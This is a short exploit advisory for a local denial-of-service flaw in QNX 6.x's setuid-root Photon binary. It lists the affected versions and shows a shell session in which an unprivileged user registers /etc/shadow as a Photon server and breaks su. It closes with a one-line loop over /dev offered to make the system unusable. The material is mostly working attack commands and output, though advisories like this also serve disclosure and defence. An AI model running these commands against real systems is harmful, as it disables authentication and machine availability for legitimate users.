# # QNX 6.x Photon denial of service vulnerability by cenobyte 2013 # # # - vulnerability description: # QNX setuid root /usr/photon/bin/Photon allows users to create new servers with # arbitrary filenames registered with the -N parameter. # Photon does not check whether files exist and/or the owner of the ile is the # same as the user. Thus any user can create a new server with a filename such # as /etc/shadow resulting in a denial of service attack. # # - vulnerable platforms: # QNX 6.5.0SP1 # QNX 6.5.0 # QNX 6.4.1 # QNX 6.3.0 # QNX 6.2.0 $ id uid=100(user) gid=100 $ /usr/photon/bin/Photon -N /etc/shadow $ su - su error: Password and Shadow files on different devices $ ps -edaf | grep Photon 100 4524851 4520182 - Oct26 ? 00:00:00 /usr/photon/bin/Photon -N /etc/shadow $ kill -9 4524851 $ su - password: Sat Oct 26 13:22:38 2013 on /dev/ttyp1 Last login: Sat Oct 26 02:43:08 2013 on /dev/ttyp1 edit the file .profile if you want to change your environment. To start the Photon windowing environment, type "ph". # If you want to make the system unusable: $ for x in $(ls /dev); do /usr/photon/bin/Photon -N "/dev/$x"; done